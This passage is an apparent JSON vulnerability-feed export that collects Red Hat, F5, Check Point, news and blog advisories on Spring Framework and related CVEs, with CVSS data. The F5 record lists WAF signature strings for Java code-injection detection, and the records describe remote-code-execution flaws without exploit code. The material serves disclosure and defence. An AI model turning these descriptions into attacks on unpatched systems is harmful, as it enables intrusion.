via spring messaging (CVE-2018-1270)\n\n* spring-security-oauth: remote code execution in the authorization process (CVE-2018-1260)\n\n* tomcat: A bug in the UTF-8 decoder can lead to DoS (CVE-2018-1336)\n\n* tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Remote Code Execution bypass for CVE-2017-12615 (CVE-2017-12617)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-10-17T19:27:11", "type": "redhat", "title": "(RHSA-2018:2939) Critical: Red Hat FIS 2.0 on Fuse 6.3.0 R8 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12615", "CVE-2017-12617", "CVE-2017-7525", "CVE-2018-1260", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1275", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-1336", "CVE-2018-7489"], "modified": "2018-10-17T19:27:42", "id": "RHSA-2018:2939", "href": "https://access.redhat.com/errata/RHSA-2018:2939", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:38:20", "description": "This release of Red Hat Fuse 7.6.0 serves as a replacement for Red Hat Fuse 7.5, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* undertow: HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* golang: HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* undertow: HTTP/2: flood using PRIORITY frames results in excessive resource consumption (CVE-2019-9513)\n\n* undertow: HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\n* golang: HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\n* undertow: HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515)\n\n* undertow: HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)\n\n* undertow: HTTP/2: request for large response leads to denial of service (CVE-2019-9517)\n\n* undertow: HTTP/2: flood using empty frames results in excessive resource consumption (CVE-2019-9518)\n\n* infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods (CVE-2019-10174)\n\n* spring-security-core: mishandling of user passwords allows logging in with a password of NULL (CVE-2019-11272)\n\n* jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution (CVE-2019-12384)\n\n* jackson-databind: default typing mishandling leading to remote code execution (CVE-2019-14379)\n\n* xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response (CVE-2019-17570)\n\n* js-jquery: Cross-site scripting via cross-domain ajax requests (CVE-2015-9251)\n\n* logback: Serialization vulnerability in SocketServer and ServerSocketReceiver (CVE-2017-5929)\n\n* js-jquery: XSS in responses from cross-origin ajax requests (CVE-2017-16012)\n\n* apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip (CVE-2018-11771)\n\n* spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher (CVE-2019-3802)\n\n* undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)\n\n* shiro: Cookie padding oracle vulnerability with default configuration (CVE-2019-12422)\n\n* jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message. (CVE-2019-12814)\n\n* jackson-databind: Polymorphic typing issue related to logback/JNDI (CVE-2019-14439)\n\n* springframework: DoS Attack via Range Requests (CVE-2018-15756)\n\n* c3p0: loading XML configuration leads to denial of service (CVE-2019-5427)\n\n* undertow: Information leak in requests for directories without trailing slashes (CVE-2019-10184)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-26T15:40:22", "type": "redhat", "title": "(RHSA-2020:0983) Important: Red Hat Fuse 7.6.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251", "CVE-2017-16012", "CVE-2017-5929", "CVE-2018-11771", "CVE-2018-12536", "CVE-2018-15756", "CVE-2019-10174", "CVE-2019-10184", "CVE-2019-10241", "CVE-2019-10247", "CVE-2019-11272", "CVE-2019-12384", "CVE-2019-12422", "CVE-2019-12814", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-17570", "CVE-2019-3802", "CVE-2019-3888", "CVE-2019-5427", "CVE-2019-9512", "CVE-2019-9513", "CVE-2019-9514", "CVE-2019-9515", "CVE-2019-9516", "CVE-2019-9517", "CVE-2019-9518"], "modified": "2021-01-13T11:11:03", "id": "RHSA-2020:0983", "href": "https://access.redhat.com/errata/RHSA-2020:0983", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:37", "description": "[](<https://thehackernews.com/images/-7wbHanO4Xuw/Wscn9dJaqqI/AAAAAAAADKk/wOdCRehQeeck79kK70BErJ6_rc7wXVZkQCLcBGAs/s728-e100/spring-framework-hacking-min.jpg>)\n\nSecurity researchers have discovered three vulnerabilities in the Spring Development Framework, one of which is a critical remote code execution flaw that could allow remote attackers to execute arbitrary code against applications built with it. \n \nSpring Framework is a popular, lightweight and an open source framework for developing Java-based enterprise applications. \n \nIn an advisory [released](<https://spring.io/blog/2018/04/05/multiple-cve-reports-published-for-the-spring-framework>) today by Pivotal, the company detailed following three vulnerabilities discovered in Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14, and older unsupported versions: \n\n\n * **Critical**: Remote Code Execution with spring-messaging (CVE-2018-1270)\n * **High**: Directory Traversal with Spring MVC on Windows (CVE-2018-1271)\n * **Low**: Multipart Content Pollution with Spring Framework (CVE-2018-1272)\n \nVulnerable Spring Framework versions expose STOMP clients over WebSocket endpoints with an in-memory STOMP broker through the 'spring-messaging' module, which could allow an attacker to send a maliciously crafted message to the broker, leading to a remote code execution attack (CVE-2018-1270). \n \n\"The use of authentication and authorization of messages, such as the one provided by Spring Security, can limit exposure to this vulnerability only to users who are allowed to use the application,\" the company suggests. \n \nThe second bug (CVE-2018-1271) resides in Spring's Web model-view-controller (MVC) that allows attackers to execute directory traversal attack and access restricted directories when configured to serve static resources (e.g., CSS, JS, images) from a file system on Windows. \n \nThis vulnerability doesn't work if you are not using Windows to serve content and can be avoided if you don't serve files from the file system or use Tomcat/WildFly as the server. \n \nPivotal has released Spring Framework 5.0.5 and 4.3.15, which include fixes for all the three vulnerabilities. The company has also released Spring Boot 2.0.1 and 1.5.11, that match the patched Spring Framework versions. \n \nSo developers and administrators are highly recommended to upgrade their software to the latest versions immediately.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-06T07:58:00", "type": "thn", "title": "Remote Execution Flaw Threatens Apps Built Using Spring Framework \u2014 Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272"], "modified": "2018-04-06T07:58:33", "id": "THN:D7C30FB307A1DC524FADFFBF2D1BEAB1", "href": "https://thehackernews.com/2018/04/spring-framework-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2019-12-02T19:26:41", "description": "\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | None | Not applicable | Not vulnerable | None | None \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | None | Not applicable | Not vulnerable | None | None \nBIG-IQ Centralized Management | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | None | Not applicable | Not vulnerable | None | None \nF5 iWorkflow | 2.x | None | Not applicable | Not vulnerable | None | None \nLineRate | ** | ** | ** | ** | ** | ** \nTraffix SDC | ** | ** | ** | ** \n | ** | ** \n** | ** | ** \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n**Confirmation of vulnerability or non-vulnerability is not presently available. F5 is still researching the issue for the products indicated, and will update this article with the most current information as soon as it has been confirmed. F5 Technical Support has no additional information on this issue.\n\nMitigating the vulnerabilities with the BIG-IP ASM system\n\nYou can use the BIG-IP ASM system to mitigate the vulnerabilities on a vulnerable device in your environment using the following attack signatures and security policy violations.\n\nCVE-2018-1270 - Remote code execution with spring-messaging\n\nAttack signatures containing one of the following strings in the name can mitigate the vulnerability:\n\n * **Java code injection - org.springframework.**\n * **java/lang/Runtime**\n * **Runtime.getRuntime**\n\nThis mitigation requires a configured virtual server set up to inspect WebSocket traffic; configuring login page enforcement on a WebSocket URL could reduce the attack surface as well, according to the vendor.\n\nCVE-2018-1271 - Directory Traversal with Spring MVC on Windows\n\nAttack signatures containing the following string in the name can mitigate the vulnerability:\n\n * **Directory Traversal attempt**\n\nYou can use the following Evasion technique detected subviolations to mitigate this vulnerability:\n\n * **Directory traversal**\n * **IIS backslashes**\n * **IIS Unicode codepoints**\n\nCVE-2018-1272 - Multipart content pollution with Spring Framework:\n\nYou can use the following HTTP protocol compliance failed subviolations to mitigate this vulnerability:\n\n * **Bad multipart/form-data request parsing**\n * **Bad multipart parameters parsing**\n * **Unparsable request content**\n\nCVE-2018-1273 \\- RCE with Spring Data Commons\n\nYou can use the following signatures and violations for mitigation:\n\n * **200003437 - Java code injection - java/lang/Runtime (Parameter)**\n\n * **200003073 - \"Runtime.getRuntime()\" execution attempt**\n\n * **200002273 - SQL-INJ exec()**\n * **All \"JAVA Servlets/JSP\" system where the name starts with \"Java code injection - *\"**\n\nCVE-2018-1274 \\- Denial of Service with Spring Data\n\nYou can configure the following settings on the BIG-IP ASM system for mitigation:\n\n * Enable the **JSON data does not comply with format **violation for the Content Profiles Policy Building Settings in the Configuration utility.** **(Navigate to **Security **> **Application Security** > **Policy Building** > **Learning and Blocking Settings** > **Content Profiles**.)\n\n * Set the length to** 999 **for the** ****Maximum Structure Depth** settings for the JSON profile. (Navigate to **Security **> **Application Security** > **Content Profiles** > **JSON Profiles**.)\n\nCVE-2018-1275 \\- RCE with Spring Framework\n\nYou can use the following signatures for mitigation:\n\n * **200003437 - Java code injection - java/lang/Runtime (Parameter)**\n\n * **200003073 - \"Runtime.getRuntime()\" execution attempt**\n\n * **200002273 - SQL-INJ exec()**\n\n * The [Spring Framework Spring-Messaging Remote Code Execution (CVE-2018-1270 / CVE-2018-1275) ](<https://devcentral.f5.com/articles/spring-framework-spring-messaging-remote-code-execution-cve-2018-1270-30767>)DevCentral article\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-07T03:50:00", "type": "f5", "title": "Multiple Spring Framework vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1275", "CVE-2018-1271", "CVE-2018-1273", "CVE-2018-1272", "CVE-2018-1270", "CVE-2018-1274"], "modified": "2018-05-17T17:12:00", "id": "F5:K29042031", "href": "https://support.f5.com/csp/article/K29042031", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_security": [{"lastseen": "2023-03-17T06:06:07", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>), [CVE-2022-22946](<https://vulners.com/cve/CVE-2022-22946>), [CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>), and [CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://vulners.com/cve/CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). \nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T21:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T21:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "pentestpartners": [{"lastseen": "2022-01-25T10:27:15", "description": "\n\nThis is the first of my posts that explain why some common security vulnerabilities are most likely **not** real threats. They should be treated as security enhancements rather than vulnerabilities. Bearing in mind the number of scanning tools that rate such vulnerabilities as "high" it's no wonder people make the mistake of reporting them. It's also a reminder to mistrust the output from something until you've verified it.\n\nI'm going to start with the not-a-vulnerability mother of them all, the HTTP TRACE (and TRACK) method. Something that could lead to an attack called Cross Site-Tracing (XST). In 20 years I have never seen a real-world exploit for it.\n\n### What is it?\n\nHTTP TRACE is a debug method that is the HTTP equivalent of the echo service: it will basically reflect back in the response what is in the request. This is relatively boring. Where it got interesting was that when the vulnerability was released (in 2003) most web servers reflected the value of the request headers back. So back in 2003, it was potentially possible to gain session cookies if the method was available. This attack was found by [Jeremiah Grossman and named XST](<https://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf>) (link opens a PDF).\n\nTRACK is a Microsoft only variant of TRACE which pretty much does the same thing.\n\nHere\u2019s an example of an HTTP request and response against an Apache server:\n\n\n\n### Why is this not a vulnerability?\n\nThe landscape of web browser security has changed significantly since 2003, The exploit shown in the original paper was designed for use with Internet Explorer and explicitly uses the ActiveX Microsoft.XMLHTTP object to call the TRACE method. IE is, of course deprecated and the ActiveX object's use was deprecated in IE 7.\n\nLet\u2019s look at it from a modern perspective. As it comes under cross-site attacks, we need to execute it in an environment that a user is using so we can discover their cookies, similar to CSRF or CORS based attacks.\n\n### From the Server perspective\n\nWe also need a web server that supports the TRACE method. The TRACE method is optional, so a HTTP server does not need to support it to be conformant. A quick survey of the most common web servers shows:\n\n * Apache HTTP supports TRACE without a request body. This is enabled by default and can be controlled with the TraceEnable directive\n * NGinx will always return a 405 Method not Allowed\n * IIS from version 6 and onwards disables it by default (except for 8.5 for some weird reason)\n\nThe Apache case is interesting, there\u2019s even a little passive aggressive note in the [documentation](<https://httpd.apache.org/docs/2.4/mod/core.html#traceenable>) about this:\n\n\n\nThat\u2019s quite a confident claim from Apache!\n\n### From the Client perspective\n\nThe thing to bear in mind with XST is that it is a client attack. It employs the user\u2019s session and user-agent to perform the attack for it. It\u2019s a very early cross-site attack along the same line as CSRF, Flash CrossDomain access and CORS attacks.\n\nThis means that we need the user-agent, i.e. the web browser to allow the use of the TRACE request and some mechanism of calling it.\n\nTo access a URL from JavaScript the usual methods are XMLHTTPRequest (XHR) or the more modern fetch() API. Similar solutions such as jQuery generally use XHR or fetch().\n\nSo can we use these, let\u2019s try XHR in Chrome, using the magic F12 hacking tool:\n\n\n\nOops, Chrome blocks the TRACE method, As Microsoft browsers caused the problem in the past, how about Edge?\n\n\n\nSo we can make a guess that all Chromium based browsers will be similar, so how about Firefox?\n\n\n\nNope. So that covers the main browsers. I don\u2019t have Safari installed but I suspect there will be no difference. How about Internet Explorer (on Windows 10)?\n\n\n\nSo, from a modern Windows 10 device none of the common browsers can even make a call to the TRACE method. Once again, I\u2019ll state that as XST is in the class of cross-site exploits it **needs** to be exploited from the user-agent against a valid session.\n\nThe other thing to bear in mind, that in the current state of play any cross-site requests will need a valid CORS policy in place. All this is making it strangely hard to exploit anything.\n\n### What about other programs?\n\nSo, I only went through web browsers; but what about other programs. Here we have similar restrictions.\n\nAir, Flash, Silverlight, Unity 3D all have restriction methods, and again, all exploits are user-agent based, By transferring to a program inside the browser you lose access to the session information.\n\nThere is a potential that a malicious plugin could have an effect, However, if you have a malicious plugin installed then there are routes which are a lot easier and more flexible to extract information.\n\n### Historical vulnerabilities\n\nA quick search through the CVE database doesn\u2019t reveal much for this vulnerability. There are few enough CVEs that they can all be listed here:\n\n * CVE-2003-1567 \u2013 highlights the TRACK method in IIS which does the same as TRACE\n * CVE-2004-2320 \u2013TRACE is enabled on WebLogic Server\n * CVE-2004-2763 \u2013TRACE is enabled on Sun ONE/iPlanet Web Server\n * CVE-2005-3398 \u2013TRACE is enabled on Solaris Management Console\n * CVE-2007-3008 \u2013TRACE is enabled on AppWeb\n * CVE-2008-7253 \u2013TRACE is enabled in Lotus Domino Server\n * CVE-2009-2823 \u2013TRACE is enabled in Apache httpd on Mac OS X\n * CVE-2010-0360 \u2013 **this is the only real vulnerability that I\u2019ve found** \u2013 there\u2019s a heap overflow in the TRACE method in Java System Web Server 7.0 Update 7 which could return undisclosed data\n * CVE-2010-0386 \u2013TRACE is enabled on Java System Application Server\n * CVE-2018-2502 \u2013TRACE is enabled on SAP Business One Service Layer\n * CVE-2018-11039 \u2013TRACE is enabled on Spring Framework\n\nAll but one of these are just highlighting the existence of TRACE (or TRACK). The only real exploit (CVE-2010-0360) is over a decade old, for a product that is no longer supported. It looks like the heap overflow can also be exploited through all methods, so, even with this TRACE adds little extra risk, and only another possible vector.\n\n### Conclusion\n\nLet\u2019s put this one to bed. It\u2019s been 20 years since it was identified. It has been neutered on the server **and** on the client so it would be far more difficult to exploit than any other form of attack on an equivalent system.\n\nRealistically, if it is in a pen test report, then it should only be informational to demonstrate that sufficient hardening hasn't been done.\n\nIt is good practice to disable anything you\u2019re not using, and you certainly don\u2019t lose any capabilities by disabling the TRACE method. I would much rather that efforts were spent fixing real vulnerabilities, rather than wasting time on facilities that have no exploit path.\n\nThe post [Security Blog](<https://www.pentestpartners.com/security-blog/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2022-01-25T06:08:46", "type": "pentestpartners", "title": "Vulnerabilities that aren\u2019t. Cross Site Tracing / XST", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-1567", "CVE-2004-2320", "CVE-2004-2763", "CVE-2005-3398", "CVE-2007-3008", "CVE-2008-7253", "CVE-2009-2823", "CVE-2010-0360", "CVE-2010-0386", "CVE-2018-11039", "CVE-2018-2502"], "modified": "2022-01-25T06:08:46", "id": "PENTESTPARTNERS:1C6EAE3D0C10C1B56BD63325DEB012A1", "href": "https://www.pentestpartners.com/security-blog/vulnerabilities-that-arent-cross-site-tracing-xst/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2021-10-22T15:44:21", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n * Critical Patch Updates, Security Alerts and Bulletins for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 319 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2019 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2559985.1>).\n\n** Please note that since the release of the April 2019 Critical Patch Update, Oracle has released two Security Alerts for Oracle WebLogic Server: CVE-2019-2725 (April 29, 2019) and CVE-2019-2729 (June 18, 2019). WebLogic Server customers are strongly advised to apply the fixes contained in this Critical Patch Update, which provides the fixes for the previously-released Alerts as well as additional fixes.**\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-07-16T00:00:00", "title": "Oracle Critical Patch Update Advisory - July 2019", "type": "oracle", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2794", "CVE-2019-2853", "CVE-2019-2820", "CVE-2019-0220", "CVE-2018-19362", "CVE-2015-9251", "CVE-2019-2768", "CVE-2019-5598", 